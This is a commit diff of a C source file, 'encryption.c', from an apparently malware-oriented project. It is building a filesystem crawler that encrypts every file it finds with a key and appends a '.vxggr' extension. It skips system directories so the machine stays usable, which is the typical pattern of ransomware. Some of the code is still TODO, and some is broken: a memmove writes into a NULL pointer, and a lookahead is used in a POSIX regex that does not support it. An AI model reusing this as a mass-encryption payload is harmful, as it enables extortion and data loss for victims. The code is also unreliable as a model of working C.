summaryrefslogtreecommitdiff
path: root/src/encryption.c
diff options
context:
space:
mode:
Diffstat (limited to 'src/encryption.c')
-rw-r--r--src/encryption.c70
1 files changed, 45 insertions, 25 deletions
diff --git a/src/encryption.c b/src/encryption.c
index a81e6aa..7d64564 100644
--- a/src/encryption.c
+++ b/src/encryption.c
@@ -32,6 +32,8 @@
32#include <stdio.h> 32#include <stdio.h>
33#include <string.h> 33#include <string.h>
34 34
35#include <regex.h>
36
35#include <errno.h> 37#include <errno.h>
36#include <error.h> 38#include <error.h>
37 39
@@ -402,39 +404,54 @@ enum CRYPTSCAN_CRYPTMODE {
402}; 404};
403 405
404struct _cryptscan_args { 406struct _cryptscan_args {
405 char *folder; 407 char *fsentry;
406 taskqueue *toscan; 408 taskqueue *toscan;
407 ctqueue *tocrypt; 409 ctqueue *tocrypt;
410 unsigned char *key;
408 enum CRYPTSCAN_CRYPTMODE mode; 411 enum CRYPTSCAN_CRYPTMODE mode;
409}; 412};
410 413
411/// Directory entries (files and folders) to exclude from encryption 414#define ENCRYPTED_EXT ".vxggr"
412#define EXCLUDED_ENTRIES ((const char* const []){\ 415#define DEFAULT_IGNORED "^(\\.config|\\.bashrc|bin|dev|lib|root|boot|etc|lib32|run|sys|usr|home|lib64|proc|sbin|var)"
413 /* Entries found in /home/<user> */ \ 416
414 ".config", ".bashrc", \ 417/// Workaround for scandir callback not letting me pass user arguments. Gross hack, but works
415 /* Entries included for extra safety, so that the encryption doesn't accidentally render the system unusable */ \ 418static enum CRYPTSCAN_CRYPTMODE _cryptscan__selector__csm = CRYPTSCAN_CRYPTMODE__UNSPEC;
416 "bin", "dev", "lib", "root", "boot", "etc", "lib32", "run", "sys", "usr", "home", "lib64", "proc", "sbin", "var"\ 419/// TODO: Map out when this is supposed to change in the other cryptscan functions
417})
418 420
419/// Helper function to select files to be encrypted 421/// Helper function to select files to be encrypted
420static int _cryptscan__selector(const struct dirent *de) { 422static int _cryptscan__selector(const struct dirent *de) {
421 // entries with non-zero returns get included, zeros get excluded 423 // entries with non-zero returns get included, zeros get excluded
422 if(!de) return 0; 424 if(!de) return 0;
425 enum CRYPTSCAN_CRYPTMODE mode = _cryptscan__selector__csm;
426
427 if(_cryptscan__selector__csm <= CRYPTSCAN_CRYPTMODE__UNSPEC || _cryptscan__selector__csm >= CRYPTSCAN_CRYPTMODE__TOOBIG) {
428 if(___VXGG___VERBOSE_ERRORS___) WARN(ERANGE, "<_cryptscan__selector> Warning: Given mode is oob. Expected: [%d, %d], Got: %d",, CRYPTSCAN_CRYPTMODE__UNSPEC + 1, CRYPTSCAN_CRYPTMODE__TOOBIG - 1, mode);
429 return 0;
430 }
423 431
424 for(int i = 0; i < STATIC_ARRAY_LEN(EXCLUDED_ENTRIES); i++) { 432 // Initialize static values
425 // Would use strncmp here but d_name doesn't have a fixed size and is supposedly guaranteed to have a null terminator so it shouldn't be a big deal 433 static regex_t *ereg = NULL, *dreg = NULL;
426 if(strcmp(de->d_name, EXCLUDED_ENTRIES[i]) == 0) 434 if(ereg == NULL) {
435 ereg = VXGG_CALLOC(1, sizeof(*ereg));
436 dreg = VXGG_CALLOC(1, sizeof(*dreg));
437 if(!ereg || !dreg) {
438 if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__selector> Warning: Could not initialize regular expression memory, skipping scan of fs entity \"%s\"",, de->d_name);
427 return 0; 439 return 0;
440 }
441
442 /// TODO: Check return values. Free the pointers and set to zero on error so the initialization runs again
443 regcomp(ereg, "\\" ENCRYPTED_EXT "|" DEFAULT_IGNORED, REG_EXTENDED | REG_ICASE | REG_NOSUB);
444 regcomp(dreg, "^(?!.+\\" ENCRYPTED_EXT ").+$|" DEFAULT_IGNORED, REG_EXTENDED | REG_ICASE | REG_NOSUB);
428 } 445 }
429 446
430 return 1; 447 return regexec((mode == CRYPTSCAN_CRYPTMODE__ENCRYPT) ? ereg : dreg, de->d_name, 0, NULL, 0);
431} 448}
432 449
433void _cryptscan_args_free(void *data) { 450void _cryptscan_args_free(void *data) {
434 if(!data) return; 451 if(!data) return;
435 struct _cryptscan_args *real = data; 452 struct _cryptscan_args *real = data;
436 453
437 free(real->folder); 454 free(real->fsentry);
438 free(real); 455 free(real);
439 return; 456 return;
440} 457}
@@ -459,11 +476,11 @@ int _cryptscan__process_scandir(const char * const folder, taskqueue *toscan, ct
459 if(!args) { 476 if(!args) {
460 if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not create arg holder for task",); 477 if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not create arg holder for task",);
461 } 478 }
462 args->folder = strdup(namelist[i]->d_name); 479 args->fsentry = strdup(namelist[i]->d_name);
463 args->tocrypt = tocrypt; 480 args->tocrypt = tocrypt;
464 args->toscan = toscan; 481 args->toscan = toscan;
465 args->mode = mode; 482 args->mode = mode;
466 if(!args->folder) {if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not duplicate file \"%s\"s name for processing",, namelist[i]->d_name); continue;} 483 if(!args->fsentry) {if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not duplicate file \"%s\"s name for processing",, namelist[i]->d_name); continue;}
467 484
468 switch(namelist[i]->d_type) { 485 switch(namelist[i]->d_type) {
469 // Try to stat the file if it's unknown 486 // Try to stat the file if it's unknown
@@ -478,7 +495,7 @@ int _cryptscan__process_scandir(const char * const folder, taskqueue *toscan, ct
478 case DT_REG: CRYPT: 495 case DT_REG: CRYPT:
479 tmptsk = task_new(_cryptscan__crypt, _cryptscan_args_free, args); 496 tmptsk = task_new(_cryptscan__crypt, _cryptscan_args_free, args);
480 if(!tmptsk) { 497 if(!tmptsk) {
481 if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not generate crypt task for \"%s\"",, args->folder); 498 if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not generate crypt task for \"%s\"",, args->fsentry);
482 break; 499 break;
483 } 500 }
484 501
@@ -497,7 +514,7 @@ int _cryptscan__process_scandir(const char * const folder, taskqueue *toscan, ct
497 case DT_DIR: SCAN: 514 case DT_DIR: SCAN:
498 tmptsk = task_new(_cryptscan__scan, _cryptscan_args_free, args); 515 tmptsk = task_new(_cryptscan__scan, _cryptscan_args_free, args);
499 if(!tmptsk) { 516 if(!tmptsk) {
500 if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not generate scan task for \"%s\"",, args->folder); 517 if(___VXGG___VERBOSE_ERRORS___) WARN(errno, "<_cryptscan__process_scandir> Warning: Could not generate scan task for \"%s\"",, args->fsentry);
501 break; 518 break;
502 } 519 }
503 520
@@ -534,24 +551,27 @@ _cryptscan__process_scandir_CLEANUP:
534int _cryptscan__scan(void *data) { 551int _cryptscan__scan(void *data) {
535 if(!data) return -1; 552 if(!data) return -1;
536 struct _cryptscan_args *real = data; 553 struct _cryptscan_args *real = data;
537 return _cryptscan__process_scandir(real->folder, real->toscan, real->tocrypt, real->mode); 554 return _cryptscan__process_scandir(real->fsentry, real->toscan, real->tocrypt, real->mode);
538} 555}
539 556
540// TODO: Implement 557/// TODO: Implement
541int _cryptscan__crypt(void *data) { 558int _cryptscan__crypt(void *data) {
542 if(!data) return -1; 559 if(!data) return -1;
560
543 struct _cryptscan_args *real = data; 561 struct _cryptscan_args *real = data;
562 char *target = NULL, *output = NULL;
544 563
545 // Read data for filename & crypt mode to generate tasks 564 // Read data for filename & crypt mode to run the task
565 int (*fp)(const char *const, const char *const, const unsigned char *) = (real->mode == CRYPTSCAN_CRYPTMODE__ENCRYPT) ? encryptviatmp : decryptto;
546 566
567 // If encrypting, take filename and append .vxggr to end. If decrypting, find .vxggr extension and truncate
568 target = real->fsentry;
569 output = (real->mode == CRYPTSCAN_CRYPTMODE__ENCRYPT) ? vxgg_sstrcat(target, ".vxggr") : memmove(output, target, strlen(target) - 6);
570 /// TODO: Keep track of the concat'ed name and free it once it's done being used
547 571
548 return 0; 572 return fp(target, output, real->key);
549} 573}
550 574
551// Going to implement this using a taskqueue. Each folder is added as a task to scan, with each file then added to a ctq for later. Scanning will be done linearly
552// for my sake, and because I do not care to do generics in C beyond what is absolutely necessary (aka I don't want to implement a hashmap/hashset to make parallel
553// execution efficient)
554
555ctqueue * cryptscan(int threads, const char * const start, enum CRYPTSCAN_CRYPTMODE mode) { 575ctqueue * cryptscan(int threads, const char * const start, enum CRYPTSCAN_CRYPTMODE mode) {
556 if(!start || threads < 1 || mode <= CRYPTSCAN_CRYPTMODE__UNSPEC || mode >= CRYPTSCAN_CRYPTMODE__TOOBIG) return NULL; 576 if(!start || threads < 1 || mode <= CRYPTSCAN_CRYPTMODE__UNSPEC || mode >= CRYPTSCAN_CRYPTMODE__TOOBIG) return NULL;
557 577